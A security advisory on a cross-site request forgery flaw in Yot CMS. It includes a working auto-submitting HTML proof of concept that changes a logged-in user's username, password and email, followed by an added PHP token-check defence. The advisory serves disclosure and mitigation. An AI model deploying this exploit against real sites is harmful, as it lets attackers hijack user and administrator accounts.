YOT CMS Cross-Site Request Forgery - user profile changing

2019.02.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Product : Yot CMS webapp
# Author : ÃŕMąŃđÒ - NullByteStream Team
# vendor homepage : https://sourceforge.net/projects/yot/
# Date : 10/2/2019
# Dork : N/A
##############################################################

This CSRF vulnerability allows an attacker to change user/admin account details (username, password, ...).

Exploit :

<html>
<body onload='document.forms[0].submit()'>
<form action="http://site.com/index.php?page=user&op=do_profil" method="POST" name="user_form" enctype="multipart/form-data" OnSubmit='return user_form_verifchamps();'>
<table name="user_form" class="tabform" cellpadding="1" align="center" >
<tr><td valign="top"><label>Pseudo</label> :</td><td valign="top"><input type="text" name="user" value="newusername" size="30" /> * </td></tr>
<tr><td valign="top"><label>Prénom</label> :</td><td valign="top"><input type="text" name="firstname" value="armando" size="30" /></td></tr>
<tr><td valign="top"><label>Nom</label> :</td><td valign="top"><input type="text" name="name" value="syria" size="30" /></td></tr>
<tr><td valign="top"><label>Mot de passe</label> :</td><td valign="top"><input type="password" name="pass1" value="newpassword" size="30" /></td></tr>
<tr><td valign="top"><label>Retaper mot de passe</label> :</td><td valign="top"><input type="password" name="pass2" value="newpassword" size="30" /></td></tr>
<tr><td valign="top"><label>Email</label> :</td><td valign="top"><input type="text" name="mail" value="MyEmail@server.com" size="30" /> * </td></tr>
<tr><td valign="top"><label>URL Avatar</label> :</td><td valign="top"><input type="text" name="avatar" value="" size="30" /></td></tr>
<tr><td valign="top"><label>Télécharger un avatar</label> :</td><td valign="top"><input type="file" name="upload_avatar" /></td></tr>
<tr><td valign="top"><label>Thème</label> :</td><td valign="top"><select name="theme"><option value="" selected></option><option value="coolbad" >coolbad</option><option value="coolbad_jaune" >coolbad_jaune</option><option value="yot3" >yot3</option></select></td></tr>
<tr><td valign="top"><label>Prévenir par email d'une nouvelle news</label> :</td><td valign="top"><input type="radio" name="mailnews" value="1" />Oui&nbsp;&nbsp;<input type="radio" name="mailnews" value="0" checked />Non&nbsp;&nbsp;</td></tr>
</table>
<div align="center">(*) Champs obligatoires<br/><br/><input type="submit" value="Modifier"/></div>
</form>
</body>
</html>

###############################################################
NBS Team http;//nullbytestream.tk
###############################################################
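
A server-side check that would reject the auto-submitted form above, as an added example that is not part of the original advisory and not Yot CMS's own code. It shows a per-session synchronizer token; the function names, the `csrf_token` field name and the simulated session and requests are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for a profile-update handler such as
// index.php?page=user&op=do_profil. Not taken from Yot CMS.

/** Return the per-session CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Hidden field to embed in the legitimate profile form. */
function csrf_field(array &$session): string
{
    $t = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $t . '" />';
}

/** True only for a POST that carries the session's token. */
function csrf_valid(array $session, array $post, string $method): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $method === 'POST'
        && is_string($expected) && $expected !== ''
        && is_string($given) && hash_equals($expected, $given);
}

// Constructed demo with a simulated session; a real handler would pass
// $_SESSION, $_POST and $_SERVER['REQUEST_METHOD'] instead.
$session = [];
echo csrf_field($session), "\n";

// Cross-site auto-submitted form: field names from the advisory, no token.
$forged = ['user' => 'newusername', 'pass1' => 'newpassword', 'pass2' => 'newpassword'];
// Same-site submission of the form that was rendered with csrf_field().
$legit  = $forged + ['csrf_token' => $session['csrf_token']];

foreach (['forged' => $forged, 'legitimate' => $legit] as $label => $post) {
    echo $label, ': ', csrf_valid($session, $post, 'POST') ? 'accepted' : 'rejected', "\n";
}
```

The handler should call the check before touching any profile field and stop with an error when it fails. Requiring the current password for a password or email change and setting the session cookie's SameSite attribute are complementary controls.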

